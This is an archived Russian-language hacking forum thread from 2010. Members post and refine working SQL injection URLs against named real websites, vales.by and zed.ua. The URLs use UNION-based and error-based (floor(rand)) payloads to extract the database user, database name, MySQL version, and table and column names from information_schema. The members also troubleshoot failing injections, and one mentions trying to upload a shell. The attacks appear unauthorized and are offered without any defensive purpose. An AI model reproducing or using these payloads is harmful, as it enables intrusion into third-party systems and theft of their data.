ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.03.2010, 22:36
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Сообщение от CyberHunter
Выложи ссыль.
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
|
|
|
24.03.2010, 22:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от root_sashok
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
Здесь юзер valesby@localhost и никакой кавычки. С чего ты взял, что там кавычка?
|
|
|
|
24.03.2010, 23:02
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Код:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет. |
|
|
|
24.03.2010, 23:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
Код:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет. Улыбнуло 
Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.
Делаем запрос:
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version()))
Получаем:
Код:
76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930
Что в HEX:
Код:
valesby@localhost:valesby:5.0.90
Тоесть
Проявляем смекалку и нестандартное мышление, товарищи... 
Последний раз редактировалось mailbrush; 24.03.2010 в 23:15..
|
|
|
|
24.03.2010, 23:34
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
там phpbb - форум
прав не хватает...  шелл не залить |
|
|
|
24.03.2010, 23:10
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Все, разобрался, это value в кавычках. Спасибо.
|
|
|
|
25.03.2010, 00:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 mailbrush:
Код:
http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
|
|
|
|
25.03.2010, 22:07
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Pashkela
2 mailbrush:
Код:
http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
http://www.vales.by/catalog.php?action=show_object&id=-1+union+select+unhex(hex(concat_ws(0x3a,user(),use r(),database(),version())))+--+
@localhost: valesby@localhost:valesby:5.0.90
|
|
|
|
25.03.2010, 07:40
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20table_name%20from%20informa tion_schema.tables%20limit%2041,1),1,64),floor(ran d(0)*2)))--
а дальше как видеть колонки в таблице ua_menu_item1 ??
зделаю так
http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x75615F 6D656E755F6974656D31%20limit%202,1),1,64),floor(ra nd(0)*2)))--
не получаеться..помоqите поjaлуста
|
|
|
|
25.03.2010, 15:18
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
Последний раз редактировалось v1d0qz; 25.03.2010 в 15:25..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид